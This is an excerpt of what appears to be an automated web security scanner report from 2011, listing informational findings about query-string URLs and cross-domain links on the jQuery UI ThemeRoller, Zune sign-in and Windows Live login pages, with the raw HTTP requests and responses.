GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2; id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

15.16. http://jqueryui.com/themeroller/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The page was loaded from a URL containing a query string:

http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.14/jquery-ui.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.14/themes/base/jquery-ui.css
http://docs.jquery.com/Donate
http://jquery.com/
http://jquery.org/
http://plugins.jquery.com/
http://static.jquery.com/ui/css/base2.css
http://static.jquery.com/ui/themeroller/app_css/app_screen.css
http://static.jquery.com/ui/themeroller/scripts/app.js
http://www.filamentgroup.com/

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:21:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 119983

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="icon" href="/images/favicon.ico" type="image/x-icon" />
           <link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <link rel="stylesheet" href="http://static.jquery.com/ui/themeroller/app_css/app_screen.css" type="text/css" media="all" />
           <link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.14/themes/base/jquery-ui.css" type="text/css" media="all" />
           <link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureH
...[SNIP]...
Shadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
           <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.14/jquery-ui.min.js" type="text/javascript"></script>
           <script src="http://static.jquery.com/ui/themeroller/scripts/app.js" type="text/javascript"></script>
...[SNIP]...
<li>
                   <a href="http://jquery.com">jQuery</a>
...[SNIP]...
<li style="padding-right: 12px;">
                   <a href="http://plugins.jquery.com/">Plugins</a>
...[SNIP]...
<li>
                   <a href="http://docs.jquery.com/Donate">Donate</a>
...[SNIP]...
</span>
               <a class="block filamentgroup" href="http://www.filamentgroup.com"><span>
...[SNIP]...
<span class="first" style="float: right; padding-right: 12px;">© 2010 The <a href="http://jquery.org/">jQuery Project</a>
...[SNIP]...

15.17. http://live.zune.net/signin.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://live.zune.net
Path:	/signin.ashx

Issue detail

The page was loaded from a URL containing a query string:

http://live.zune.net/signin.ashx?ru=http%3a%2f%2fsocial.zune.net%2fMOVIES%2f0%2f34FA18EC-ECDA-4609-BE85-CE80D58C3842%3ftarget%3dweb

The response contains the following link to another domain:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309960756&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&lc=1033&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046

Request

GET /signin.ashx?ru=http%3a%2f%2fsocial.zune.net%2fMOVIES%2f0%2f34FA18EC-ECDA-4609-BE85-CE80D58C3842%3ftarget%3dweb HTTP/1.1
Host: live.zune.net
Proxy-Connection: keep-alive
Referer: http://social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842?target=web
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EXPUID=dcc9a7e6-6804-4906-b5d8-7b37c2f999d3; defCulture=en-US; lastCulture=en-US; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1309940314388:ss=1309940283855

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309960756&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&lc=1033&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
lx-svr: S804
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 13:59:16 GMT
Content-Length: 568

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309960756&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&lc=1033&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046">here</a>
...[SNIP]...

15.18. http://live.zune.net/signin.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://live.zune.net
Path:	/signin.ashx

Issue detail

The page was loaded from a URL containing a query string:

http://live.zune.net/signin.ashx?ru=http%3a%2f%2fsocial.zune.net%2fhome

The response contains the following link to another domain:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309961344&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2Fhome&lc=1033&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2Fhome&id=75046

Request

GET /signin.ashx?ru=http%3a%2f%2fsocial.zune.net%2fhome HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309961344&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2Fhome&lc=1033&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2Fhome&id=75046
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
lx-svr: S802
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:09:03 GMT
Connection: close
Content-Length: 432

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309961344&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2Fhome&lc=1033&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2Fhome&id=75046">here</a>
...[SNIP]...

15.19. http://live.zune.net/signin.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://live.zune.net
Path:	/signin.ashx

Issue detail

The page was loaded from a URL containing a query string:

http://live.zune.net/signin.ashx?ru=http%3a%2f%2fsocial.zune.net%2fMOVIES%2f0%2f34FA18EC-ECDA-4609-BE85-CE80D58C3842%3ftarget%3dweb

The response contains the following link to another domain:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309951237&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&lc=1033&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046

Request

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309951237&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&lc=1033&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
lx-svr: S803
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 11:20:37 GMT
Content-Length: 568

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309951237&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&lc=1033&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046">here</a>
...[SNIP]...

15.20. https://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/login.srf

Issue detail

The page was loaded from a URL containing a query string:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&lc=1033&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046

The response contains the following links to other domains:

https://accountservices.passport.net/?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&vv=1100&mkt=EN-US&lc=1033&id=10
https://accountservices.passport.net/PPTOU.srf?ru=https://login.live.com/login.srf%3Fwa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1309951117%26rver%3D5.5.4177.0%26wp%3DLBI%26wreply%3Dhttps:%252F%252Flive.zune.net%252Fxweb%252Flive%252Fpassport%252FsetCookies.ashx%253Frru%253DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb%26cb%3DB001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb%26id%3D75046%26vv%3D1100%26mkt%3DEN-US%26lc%3D1033&wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&vv=1100&mkt=EN-US&lc=1033
https://accountservices.passport.net/ppnetworkhome.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&vv=1100&mkt=EN-US&lc=1033
https://live.zune.net/xweb/passport/bottomCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0
https://live.zune.net/xweb/passport/leftCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0
https://live.zune.net/xweb/passport/rightCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0
https://live.zune.net/xweb/passport/topCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&lc=1033&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046 HTTP/1.1
Host: login.live.com
Connection: keep-alive
Referer: http://social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842?target=web
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlidperf=throughput=2&latency=1884; Sample=17; MWTMsgr=1; MUID=E361C23374E642C998D8ABA7166A75EC; E=P:P/yZGuUJzog=:Kzhdi7iyZGIIP6617hxekA9uY0QbUMz6hwgjPGAdv04=:F; xid=4eaac30d-fa12-4b9e-a769-aec310f3e37a&&BL2xxxxxC664&230; xidseq=1; MSPRequ=lt=1309950913&co=1&id=73625; MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 16917
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 13:58:08 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1309960748&co=1&id=75046; path=/;version=1
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-bf6316c0-d399-403e-a23b-be0acd8ba11f; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1O47 V: 0
Date: Wed, 06 Jul 2011 13:59:08 GMT
Connection: close



<html dir="ltr"><head><meta http-equiv="Content-T
...[SNIP]...
<td colspan="3"><iframe src="https://live.zune.net/xweb/passport/topCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0" width="100%" height="260" frameborder="0" scrolling="no" align="top" marginwidth="0" marginheight="0" name="i6000"></iframe>
...[SNIP]...
<td valign="top" class="css9993"><iframe src="https://live.zune.net/xweb/passport/leftCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0" width="90" height="390" frameborder="0" scrolling="no" align="top" marginwidth="0" marginheight="0" name="i6001"></iframe>
...[SNIP]...
<td rowspan="3" valign="top"><a href="https://accountservices.passport.net/ppnetworkhome.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&vv=1100&mkt=EN-US&lc=1033" target="_blank" id="i1071"><img src="images/LiveID16.gif?x=11.0.18163.0" alt="Windows Live ID" border="0" id="i2033" class="css0189"/>
...[SNIP]...
<td class="css0175"><a href="https://accountservices.passport.net/ppnetworkhome.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&vv=1100&mkt=EN-US&lc=1033" target="_blank" id="i1071">Windows Live ID</a>
...[SNIP]...
<nobr><a href="https://accountservices.passport.net/?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&vv=1100&mkt=EN-US&lc=1033&id=10" target="_top" id="i1081">Account Services</a>
...[SNIP]...
<nobr><a href="https://accountservices.passport.net/PPTOU.srf?ru=https://login.live.com/login.srf%3Fwa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1309951117%26rver%3D5.5.4177.0%26wp%3DLBI%26wreply%3Dhttps:%252F%252Flive.zune.net%252Fxweb%252Flive%252Fpassport%252FsetCookies.ashx%253Frru%253DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb%26cb%3DB001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb%26id%3D75046%26vv%3D1100%26mkt%3DEN-US%26lc%3D1033&wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&vv=1100&mkt=EN-US&lc=1033" target="_top" id="i1009">Terms of Use</a>
...[SNIP]...
